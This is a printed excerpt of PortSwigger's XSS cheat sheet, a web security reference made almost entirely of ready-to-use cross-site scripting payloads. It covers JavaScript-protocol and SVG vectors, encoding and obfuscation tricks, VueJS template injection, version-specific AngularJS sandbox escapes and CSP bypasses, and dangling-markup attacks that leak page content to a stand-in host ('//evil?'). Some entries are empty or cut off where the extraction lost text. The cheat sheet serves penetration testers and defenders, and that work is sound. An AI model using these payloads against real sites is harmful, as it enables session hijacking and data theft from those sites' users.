onload and DOMException object

Copy

Link

onpageshow and WebTransportError object

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 29/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onerror and ReferenceError without throw

Copy

Link

Frameworks

Bootstrap onanimationstart event

<xss class=progress-bar-animated onanimationstart=alert(1)>

Copy

Link

Bootstrap ontransitionend event

<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-i

Copy

Link

Protocols

Iframe src attribute JavaScript protocol

Copy

Link

Object data attribute with JavaScript protocol

Copy

Link

Embed src attribute with JavaScript protocol

Copy

Link

A standard JavaScript protocol

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 30/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

The protocol is not case sensitive

Copy

Link

Characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>

Copy

Link

Characters \x09,\x0a,\x0d are allowed inside the protocol

<a href="javas cript:alert(1)">XSS</a>

Copy

Link

Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

<a href="javascript :alert(1)">XSS</a>

Copy

Link

Xlink namespace inside SVG with JavaScript protocol

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

Copy

Link

SVG animate tag using values

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</te

</a>

Copy

Link

SVG animate tag using to

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20

y=20>XSS</text></a>

Copy

Link

SVG set tag

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 31/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</tex
</a>

Copy

Link

Data protocol inside script src

Copy

Link

SVG script href attribute without closing script tag

<svg><script href="data:text/javascript,alert(1)" />

Copy

Link

SVG use element Chrome/Firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'

xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x
y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Copy

Link

Import statement with data URL

Copy

Link

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Copy

Link

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Copy

Link

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 32/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Copy

Link

Animate tag with keytimes and multiple values

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1

values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Copy

Link

Animate tag with auto executing use element

<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,<svg id='x'

xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>#x" /><use id=x />

Copy

Link

Embed supports code attribute

<embed code=https://portswigger-labs.net width=500 height=500 type=text/html>

Copy

Link

Object tag supports param url

<object width=500 height=500 type=text/html><param name=url value=https://portswigger-labs.net>

Copy

Link

Object tag supports param code

<object width=500 height=500 type=text/html><param name=code value=https://portswigger-labs.net>

Copy

Link

Object tag supports param movie

<object width=500 height=500 type=text/html><param name=movie value=https://portswigger-labs.net>

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 33/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Object tag supports param src

<object width=500 height=500 type=text/html><param name=src value=https://portswigger-labs.net>

Copy

Link

Navigation navigate method

Copy

Link

Other useful attributes

Using srcdoc attribute

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Copy

Link

Using srcdoc with entities

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Copy

Link

Click a submit element from anywhere on the page, even outside the form

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Copy

Link

Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Copy

Link

Link elements: Access key attributes can enable XSS on normally unexploitable elements

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Copy

Link

Download attribute can save a copy of the current webpage

<a href=# download="filename.html">Test</a>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 34/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

Disable referrer using referrerpolicy

<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Copy

Link

Set window.name via parameter on the window.open function

<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?

context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Copy

Link

Set window.name via name attribute in a <iframe> tag

<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)

</iframe>

Copy

Link

Set window.name via target attribute in a <base> tag

<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?

context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Copy

Link

Set window.name via target attribute in a <a> tag

<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?

context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Copy

Link

Set window.name via usemap attribute in a <img> tag

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect"

coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//"></map>

Copy

Link

Set window.name via target attribute in a <form> tag

<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x

value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS v
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 35/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
target in a form"></form>

Copy

Link

Set window.name via formtarget attribute in a <input> tag type submit

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><

type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS
formtarget in input type submit"></form>

Copy

Link

Set window.name via formtarget attribute in a <input> tag type image

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><

name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php"
formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Copy

Link

Special tags

Redirect to a different domain

<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Copy

Link

Meta charset attribute UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

Link

Meta charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

Link

UTF-7 BOM characters (Has to be at the start of the document) 1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

Link

UTF-7 BOM characters (Has to be at the start of the document) 2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 36/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

UTF-7 BOM characters (Has to be at the start of the document) 3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

Link

UTF-7 BOM characters (Has to be at the start of the document) 4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Copy

Link

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Copy

Link

Disable JavaScript via iframe sandbox

<iframe sandbox src="//portswigger-labs.net"></iframe>

Copy

Link

Disable referer

<meta name="referrer" content="no-referrer">

Copy

Link

Encoding

Overlong UTF-8

%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script>

%F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Copy

Link

Unicode escapes

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 37/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Unicode escapes ES6 style

Copy

Link

Unicode escapes ES6 style zero padded

Copy

Link

Hex encoding JavaScript escapes

Copy

Link

Octal encoding

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Copy

Link

Decimal encoding with optional semi-colon

<a href="javascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>

Copy

Link

SVG script with HTML encoding

<svg><script>alert(1)</script></svg> <svg><script>alert(1)</script></svg> <svg><script>alert&NewLine;(

</script></svg> <svg><script>x="",alert(1)//";</script></svg>

Copy

Link

Decimal encoding with padded zeros

Copy

Link

Hex encoding entities

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 38/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

Hex encoding without semi-colon provided next character is not a-f0-9

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a

avascript:alert(1)">XSS</a>

Copy

Link

Hex encoding with padded zeros

Copy

Link

Hex encoding is not case sensitive

Copy

Link

HTML entities

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a

href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert(1)">XSS</a>

Copy

Link

URL encoding

Copy

Link

HTML entities and URL encoding

Copy

Link

Obfuscation

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 39/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Data protocol inside script src with base64

Copy

Link

Data protocol inside script src with base64 and HTML entities

Copy

Link

Data protocol inside script src with base64 and URL encoding

Copy

Link

Iframe srcdoc HTML encoded

Copy

Link

Iframe JavaScript URL with HTML and URL encoding

Copy

Link

SVG script with unicode escapes and HTML encoding

Copy

Link

Img tag with base64 encoding

<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 40/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Client-side template injection

VueJS reflected

Version 2

Mario Heiderich (Cure53)

41
{{constructor.constructor('alert(1)')()}}

Copy

Link

Version 2

Mario Heiderich (Cure53) & Sebastian Lekies (Google) & Eduardo Vela Nava (Google) & Krzysztof Kotowicz (Google)

62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>

Copy

Link

Version 2

Gareth Heyes (PortSwigger)

Copy

Link

Version 2

Peter af Geijerstam (Swedish Shellcode Factory)

37
<x v-if=_c.constructor('alert(1)')()>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

32
{{_c.constructor('alert(1)')()}}

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 41/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

32
{{_v.constructor('alert(1)')()}}

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

32
{{_s.constructor('alert(1)')()}}

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

<x v-on:click='_b.constructor`alert(1)`()'>click</x>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

41
<x v-bind:a='_b.constructor`alert(1)`()'>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
<x @[_b.constructor`alert(1)`()]>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 42/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
33
<x :[_b.constructor`alert(1)`()]>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
<p v-=_c.constructor`alert(1)`()>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
<x #[_c.constructor`alert(1)`()]>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)
32

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

32
{{_c.constructor('alert(1)')()}}

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

30
{{_b.constructor`alert(1)`()}}

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

40
<x v-bind:is="'script'" src="//14.rs" />

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 43/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

27
<x is=script src=//⑭.₨>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

48
<x @click='_b.constructor`alert(1)`()'>click</x>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
<x @[_b.constructor`alert(1)`()]>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
<x #[_c.constructor`alert(1)`()]>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

52
<x title"="<iframe&Tab;onload&Tab;=alert(1)>">

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 44/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)
31

<xyz<img/src onerror=alert(1)>>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

116
<svg><svg><b><noscript></noscript><iframe&Tab;onload=setTimeout(/alert(1)/.source)></noscript></b><

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

59
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 45/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
45
<img src @error=e=$event.path.pop().alert(1)>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

55
<img src @error=e=$event.composedPath().pop().alert(1)>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

30
<img src @error=this.alert(1)>

Copy

Link

Version 2

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 2

Davit Karapetyan (Independent consultant)

72
<p slot-scope="){}}])+this.constructor.constructor('alert(1)')()})};//">

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

40
{{_openBlock.constructor('alert(1)')()}}

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

42
{{_createBlock.constructor('alert(1)')()}}

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 46/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

46
{{_toDisplayString.constructor('alert(1)')()}}

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

42
{{_createVNode.constructor('alert(1)')()}}

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

41
<x @[_openBlock.constructor`alert(1)`()]>

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

42
<x @[_capitalize.constructor`alert(1)`()]>

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

52
<x @click=_withCtx.constructor`alert(1)`()>click</x>

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 47/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

<x @click=$event.view.alert(1)>click</x>

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

33
{{$emit.constructor`alert(1)`()}}

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

85
<teleport to=script:nth-child(2)>alert(1)</teleport></div><script></script>

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

<teleport to=script:nth-child(2)>alert(1)</teleport></div><script></script>

Copy

Link

Version 3

Gareth Heyes (PortSwigger) & Lewis Ardern & PwnFunction (Independent consultant)

<component is=script text=alert(1)>

Copy

Link

AngularJS sandbox escapes reflected

1.0.1 - 1.1.5

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 48/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Mario Heiderich (Cure53)

Copy

Link

1.0.1 - 1.1.5 (shorter)

Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)

Copy

Link

1.2.0 - 1.2.1

Jann Horn (Google)

122
{{a='constructor';b=
{};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Copy

Link

1.2.2 - 1.2.5

Gareth Heyes (PortSwigger)

23
{{{}.")));alert(1)//"}}

Copy

Link

1.2.6 - 1.2.18

Jan Horn (Google)

106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

Copy

Link

1.2.19 - 1.2.23

Mathias Karlsson (Detectify)

124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor);}}

Copy

Link

1.2.24 - 1.2.29

Gareth Heyes (PortSwigger)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 49/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
23
{{{}.")));alert(1)//"}}

Copy

Link

1.2.27-1.2.29/1.3.0-1.3.20

Gareth Heyes (PortSwigger)

23
{{{}.")));alert(1)//"}}

Copy

Link

1.3.0

Gábor Molnár (Google)

272
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (app
constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a
'delete F.valueOf;' + 'alert(1);' )));}}

Copy

Link

1.3.3 - 1.3.18

Gareth Heyes (PortSwigger)

128
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=
[].join;$eval('x=alert(1)//');}}

Copy

Link

1.3.19

Gareth Heyes (PortSwigger)

102

{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

Copy

Link

1.3.20

Gareth Heyes (PortSwigger)

65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

Copy

Link

1.4.0 - 1.4.9

Gareth Heyes (PortSwigger)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 50/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

Copy

Link

1.5.0 - 1.5.8

Ian Hickey & Gareth Heyes (PortSwigger)

{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

Copy

Link

1.5.9 - 1.5.11

Jann Horn (Google)

517

{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=o
B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:
(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; ");
m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');
[].push.apply=a; }}

Copy

Link

1.5.9 - 1.5.11 shorter

Jann Horn (Google) & Lukasz Plonka

326
{{c=''.sub.call;b=''.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on;
C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='alert(1)';a
e.argument={type:'Identifier'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)

Copy

Link

>=1.6.0

Mario Heiderich (Cure53)

Copy

Link

>=1.6.0 (shorter)

Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)

Copy

Link

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 51/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

37
constructor.constructor('alert(1)')()

Copy

Link

1.2.0 - 1.2.18

Jann Horn (Google)

118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert
()

Copy

Link

1.2.19 - 1.2.23

Mathias Karlsson (Detectify)

119

toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor)

Copy

Link

1.2.24 - 1.2.26

Gareth Heyes (PortSwigger)

317

{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]
['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__
['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

Copy

Link

1.2.27-1.2.29/1.3.0-1.3.20

Gareth Heyes (PortSwigger)

20
{}.")));alert(1)//";

Copy

Link

1.4.0-1.4.5

Gareth Heyes (PortSwigger)

75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 52/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

1.4.2-1.5.8

Gareth Heyes (PortSwigger) & Daniel Kachakil (Anvil Ventures)

{y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'

Copy

Link

>=1.6.0

Mario Heiderich (Cure53)

37
constructor.constructor('alert(1)')()

Copy

Link

1.4.4 (without strings)

Gareth Heyes (PortSwigger)

134
toString().constructor.prototype.charAt=[].join;
[1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

Copy

Link

AngularJS CSP bypasses

All versions (all browsers) using from

Gareth Heyes (PortSwigger)

<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

Copy

Link

All versions (all browsers) shorter using assignment

Gareth Heyes (PortSwigger)

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>

Copy

Link

All versions (all browsers) shorter

Gareth Heyes (PortSwigger)

91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 53/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
1.2.0 - 1.5.0

Eduardo Vela (Google)

190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><
ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

Copy

Link

All versions (all browsers) shorter via oncut

Savan Gadhiya (NotSoSecure)

Copy

Link

Scriptless attacks

Dangling markup

Background attribute

<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody

background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//e

Copy

Link

Link href stylesheet

<link rel=stylesheet href="//evil?

Copy

Link

Link href icon

<link rel=icon href="//evil?

Copy

Link

Meta refresh

<meta http-equiv="refresh" content="0; http://evil?

Copy

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 54/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Link

Img to pass markup through src attribute

<img src="//evil? <image src="//evil?

Copy

Link

Video using track element

<video><track default src="//evil?

Copy

Link

Video using source element and src attribute

<video><source src="//evil?

Copy

Link

Audio using source element and src attribute

<audio><source src="//evil?

Copy

Link

Input src

<input type=image src="//evil?

Copy

Link

Button using formaction

<form><button style="width:100%;height:100%" type=submit formaction="//evil?

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 55/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Input using formaction

<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Copy

Link

Form using action

<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Copy

Link

Object data

Copy

